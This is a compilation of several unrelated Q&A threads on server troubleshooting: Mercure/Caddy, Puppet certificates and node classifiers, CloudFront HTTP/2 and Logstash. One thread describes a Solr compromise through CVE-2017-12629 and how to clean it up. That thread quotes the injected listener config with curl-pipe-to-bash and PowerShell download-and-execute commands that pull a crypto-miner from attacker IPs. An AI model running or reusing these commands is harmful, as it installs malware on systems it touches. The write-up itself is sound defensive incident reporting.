I have installed Caddy in my CentOS 7 then I have downloaded the latest mercure that uses Caddy.
I tried to run mercure using the below command:
/usr/bin/caddy run --environ --config Caddyfile.
The Caddyfile has the following config:
# Learn how to configure the Mercure.rocks Hub on https://mercure.rocks/docs/hub/config
{
# Debug mode (disable it in production!)
{$DEBUG}
# HTTP/3 support
servers {
protocol {
experimental_http3
}
}
}
{$SERVER_NAME:domain.com:4134}
log
route {
encode zstd gzip
mercure {
# Transport to use (default to Bolt)
transport_url {$MERCURE_TRANSPORT_URL:bolt://mercure.db}
# Publisher JWT key
publisher_jwt xxxxx
# Subscriber JWT key
subscriber_jwt xxxxx
# Extra directives
{$MERCURE_EXTRA_DIRECTIVES}
}
respond /healthz 200
respond "Not Found" 404
}
I'm getting this error:
2021/08/15 18:35:14.802 INFO using provided configuration {"config_file": "Caddyfile", "config_adapter": ""}
run: adapting config using caddyfile: parsing caddyfile tokens for 'route': Caddyfile:34 - Error during parsing: unrecognized directive: mercure
I do not know why it is not recognizing mercure directive. I used the provided config file. Any help please? Thanks.
Related
I'm learning Puppet now. Everything is new to me... After installed a puppet7 server and agent on my two learning VMs--
192.168.160.131 puppet-mst.eisen #The puppet server
192.168.160.140 sles12.eisen #The puppet agent
And I've successfully signed the node "sles12.eisen" to the server "puppet-mst.eisen" --
[root#puppet-mst manifests]# puppetserver --version
puppetserver version: 7.4.1
[root#puppet-mst manifests]# puppetserver ca list --all
Signed Certificates:
puppet-mst.eisen (SHA256) 0B:3F:DA:60:2F:2D:D3:91:94:58:E2:B6:32:28:50:8E:D4:1C:A0:8F:A0:CF:94:99:6E:EE:99:46:B4:1D:30:58 alt names: ["DNS:puppet-mst.eisen"] authorization extensions: [pp_cli_auth: true]
puppet-mst (SHA256) C8:89:47:D2:15:74:6E:49:E7:9A:27:B5:EA:10:9B:81:C4:DC:68:E8:B4:01:07:5D:63:34:5A:AF:B6:66:C9:EE alt names: ["DNS:puppet-mst"]
sles12.eisen (SHA256) C5:40:D7:8A:C6:64:BD:E8:BF:D3:BB:5D:01:24:66:03:57:96:84:31:84:42:DF:36:AA:D1:25:14:76:4D:A5:99 alt names: ["DNS:sles12.eisen"]
Then I wrote a testing module --filetest1, and hope it can put a file to the agent node in /tmp/puppettest --
[root#puppet-mst manifests]# cat /etc/puppetlabs/code/environments/production/modules/filetest1/manifests/init.pp
class filetest1{
file {'/tmp/puppettest/filetest1':
ensure => file,
content => 'Hello World!',
}
}
[root#puppet-mst manifests]# cat /etc/puppetlabs/code/environments/production/manifests/site.pp
node 'sles12.eisen'{
include filetest1
}
But the "puppet agent --test" can't work, it's said it either server can't find agent node, or the test module's catalog is missing --
sles12:/tmp/puppettest # puppet --version
7.12.0
sles12:/tmp/puppettest # hostname -f
sles12.eisen
sles12:/tmp/puppettest # puppet agent --test --verbose
Info: Using environment 'production'
Info: Retrieving pluginfacts
Info: Retrieving plugin
Error: Could not retrieve catalog from remote server: Error 500 on SERVER: Server Error: Failed when searching for node sles12.eisen: Failed to find sles12.eisen via exec: Execution of '/etc/puppetlabs/puppet/node.rb sles12.eisen' returned 1:
Warning: Not using cache on failed catalog
Error: Could not retrieve catalog; skipping run
I don't know what's wrong here. Please kind help. Thanks
Regards
Eisen
The error message suggests that you have configured Puppet to use an external node classifier (/etc/puppetlabs/puppet/node.rb), and either the attempt to execute it is failing altogether, or it is terminating with a failure status, or it is not outputting anything.
You may want to explore ENCs later, but now is probably not the time for that. To disable use of an ENC, edit /etc/puppetlabs/puppet/puppet.conf and either remove the node_terminus setting or change its value to plain.
Prehistory:
My friend's site started to work slowly.
This site uses docker.
htop told me that all cores loaded on 100% by the process /var/tmp/sustes with the user 8983. Tried to find out what is sustes, but Google did not help, but 8983 tells that the problem in Solr container.
Tried to update Solr from v6.? to 7.4 and got the message:
o.a.s.c.SolrCore Error while closing
...
Caused by: org.apache.solr.common.SolrException: Error loading class
'solr.RunExecutableListener'
Rolled back to v6.6.4 (as the only available v6 on docker-hub https://hub.docker.com/_/solr/) as site should continue working.
In Dockers logs I found:
[x:default] o.a.s.c.S.SolrConfigHandler Executed config commands successfully and persited to File System [{"update-listener":{
"exe":"sh",
"name":"newlistener-02",
"args":[
-"c",
"curl -s http://192.99.142.226:8220/mr.sh | bash -sh"],
"event":"newSearcher",
"class":"solr.RunExecutableListener",
"dir":"/bin/"}}]
So at http://192.99.142.226:8220/mr.sh we can find the malware code which installs crypto miner (crypto miner config: http://192.99.142.226:8220/wt.conf).
Using the link http://example.com:8983/solr/YOUR_CORE_NAME/config we can find full config, but right now we need just listener section:
"listener":[{
"event":"newSearcher",
"class":"solr.QuerySenderListener",
"queries":[]},
{
"event":"firstSearcher",
"class":"solr.QuerySenderListener",
"queries":[]},
{
"exe":"sh",
"name":"newlistener-02",
"args":["-c",
"curl -s http://192.99.142.226:8220/mr.sh | bash -sh"],
"event":"newSearcher",
"class":"solr.RunExecutableListener",
"dir":"/bin/"},
{
"exe":"sh",
"name":"newlistener-25",
"args":["-c",
"curl -s http://192.99.142.226:8220/mr.sh | bash -sh"],
"event":"newSearcher",
"class":"solr.RunExecutableListener",
"dir":"/bin/"},
{
"exe":"cmd.exe",
"name":"newlistener-00",
"args":["/c",
"powershell IEX (New-Object Net.WebClient).DownloadString('http://192.99.142.248:8220/1.ps1')"],
"event":"newSearcher",
"class":"solr.RunExecutableListener",
"dir":"cmd.exe"}],
As we do not have such settings at solrconfig.xml, I found them at /opt/solr/server/solr/mycores/YOUR_CORE_NAME/conf/configoverlay.json (the settings of this file can be found at http://example.com:8983/solr/YOUR_CORE_NAME/config/overlay
Fixing:
Clean configoverlay.json, or simply remove this file (rm /opt/solr/server/solr/mycores/YOUR_CORE_NAME/conf/configoverlay.json).
Restart Solr (how to Start\Stop - https://lucene.apache.org/solr/guide/6_6/running-solr.html#RunningSolr-StarttheServer) or restart docker container.
As I understand, this attack is possible due to CVE-2017-12629:
How to Attack Apache Solr By Using CVE-2017-12629 - https://spz.io/2018/01/26/attack-apache-solr-using-cve-2017-12629/
CVE-2017-12629: Remove RunExecutableListener from Solr - https://issues.apache.org/jira/browse/SOLR-11482?attachmentOrder=asc
... and is being fixed in v5.5.5, 6.6.2+, 7.1+
which is due to freely available http://example.com:8983 for anyone, so despite this exploit is fixed, lets...
Add protection to http://example.com:8983
Based on https://lucene.apache.org/solr/guide/6_6/basic-authentication-plugin.html#basic-authentication-plugin
Create security.json with:
{
"authentication":{
"blockUnknown": true,
"class":"solr.BasicAuthPlugin",
"credentials":{"solr":"IV0EHq1OnNrj6gvRCwvFwTrZ1+z1oBbnQdiVC3otuq0=
Ndd7LKvVBAaZIF0QAVi1ekCfAJXr1GGfLtRUXhgrF8c="}
},
"authorization":{
"class":"solr.RuleBasedAuthorizationPlugin",
"permissions":[{"name":"security-edit",
"role":"admin"}],
"user-role":{"solr":"admin"}
}}
This file must be dropped at /opt/solr/server/solr/ (ie next to solr.xml)
As Solr has its own Hash-checker (as a sha256(password+salt) hash), a typical solution can not be used here. The easiest way to generate hash that Ive found is to download jar file from here http://www.planetcobalt.net/sdb/solr_password_hash.shtml (at the end of the article) and run it as java -jar SolrPasswordHash.jar NewPassword.
Because I use docker-compose, I simply build Solr like this:
# project/dockerfiles/solr/Dockerfile
FROM solr:7.4
ADD security.json /opt/solr/server/solr/
# project/sources/docker-compose.yml (just Solr part)
solr:
build: ./dockerfiles/solr/
container_name: solr-container
# Check if 'default' core is created. If not, then create it.
entrypoint:
- docker-entrypoint.sh
- solr-precreate
- default
# Access to web interface from host to container, i.e 127.0.0.1:8983
ports:
- "8983:8983"
volumes:
- ./dockerfiles/solr/default:/opt/solr/server/solr/mycores/default # configs
- ../data/solr/default/data:/opt/solr/server/solr/mycores/default/data # indexes
I'm not able to make a puppet node join a master, i'm using puppet enterprise on AWS cloud.
Master
puppetserver --version
puppetserver version: 2017.3.0.38
Node
# puppet agent --test
Error: Could not request certificate: Error 403 on SERVER: Forbidden request: /puppet-ca/v1/certificate/ca (method :get). Please see the server logs for details.
Exiting; failed to retrieve certificate and waitforcert is disabled
obviously error message is related to permission on master side, when i check the log on the master i see
ERROR [qtp2147089302-255] [p.t.a.rules] Forbidden request: 10.0.10.224 access to /puppet-ca/v1/certificate/ca (method :get) (authenticated: false) denied by rule 'puppetlabs certificate'.
but i checked that the new HOCON format for auth.conf is allowing un authenticated node to send CSR
{
"allow-unauthenticated": "*",
"match-request": {
"method": "get",
"path": "/puppet-ca/v1/certificate/",
"query-params": {},
"type": "path"
},
"name": "puppetlabs certificate",
"sort-order": 500
}
i checked also that pe-puppet-server.conf is not using the legacy auth.conf method
# (optional) Authorize access to Puppet master endpoints via rules specified
# in the legacy Puppet auth.conf file (if true or not specified) or via rules
# specified in the Puppet Server HOCON-formatted auth.conf (if false).
use-legacy-auth-conf: false
max-active-instances: 2
max-requests-per-instance: 0
environment-class-cache-enabled: true
please advise, the same error msg occurs on both windows and linux
i did reboot the entire server(ec2 instance) since reloading puppetserver didn't help ... i also did the auth change from the console, as structed here
windows Puppet agent does not connect to the awsopsworks puppet Enterprise master
I had a similar issue when trying to setup my puppet nodes, but was using Vagrant instead of AWS.
The fix was to unset the following environment variables: http_proxy, https_proxy, HTTP_PROXY and HTTPS_PROXY.
My fix was to remove server_list from puppet.conf, cleanup CM cert and re-generate cert. In my case I have autosign=true so the process was:
Stop PE on CM:
systemctl stop puppet pxp-agent pe-puppetserver pe-puppetdb
Remove ssl dir
rm -fr /etc/puppetlabs/puppet/ssl
Cleanup cert from Primary:
puppetserver ca clean --certname='<CM>'
Run puppet agent on CM
puppet agent -t
Done.
How to enable HTTP/2 support in CloudFront using serverless?
I am using serverless (https://github.com/serverless/serverless) to create a simple serverless application that serves HTML + JS from S3 container using CloudFront.
To this end, I am writing a serverless.yml template that will afterwards build this setup for me.
What do I need to include/configure in the template in order to enable HTTP/2 support in CloudFront?
This can be achieved by adding HttpVersion: 'http2' below DistributionConfig: property. See full example below.
## Specifying the CloudFront Distribution to server your Web Application
WebAppCloudFrontDistribution:
Type: AWS::CloudFront::Distribution
Properties:
DistributionConfig:
HttpVersion: 'http2'
Origins:
- DomainName: ${self:custom.s3Bucket}.s3.amazonaws.com
## An identifier for the origin which must be unique within the distribution
Id: WebApp
CustomOriginConfig:
HTTPPort: 80
HTTPSPort: 443
OriginProtocolPolicy: https-only
## In case you want to restrict the bucket access use S3OriginConfig and remove CustomOriginConfig
# S3OriginConfig:
# OriginAccessIdentity: origin-access-identity/cloudfront/E127EXAMPLE51Z
Enabled: 'true'
## Uncomment the following section in case you are using a custom domain
# Aliases:
# - mysite.example.com
DefaultRootObject: index.html
## Since the Single Page App is taking care of the routing we need to make sure ever path is served with index.html
## The only exception are files that actually exist e.h. app.js, reset.css
Been looking all over the web for a configuration example of the logstash http input plugin configuration, and tried to follow the once I've found. Still running in to problem with the following configuration:
input {
http {
host => "127.0.0.1"
post => "31311"
tags => "wpedit"
}
}
output {
elasticsearch {hosts => "localhost:9400"}
}
When running service logstash restart it responds with Configuration error. Not restarting. Re-run with configtest parameter for details.
So I ran a configuration test (/opt/logstash/bin/logstash --configtest) and it says everything is fine.
So, my question is, how can I find whats wrong with the configuration? Can you see anything obviously incorrect? I'm fairly new to the world of Elasticsearch, if you could not tell...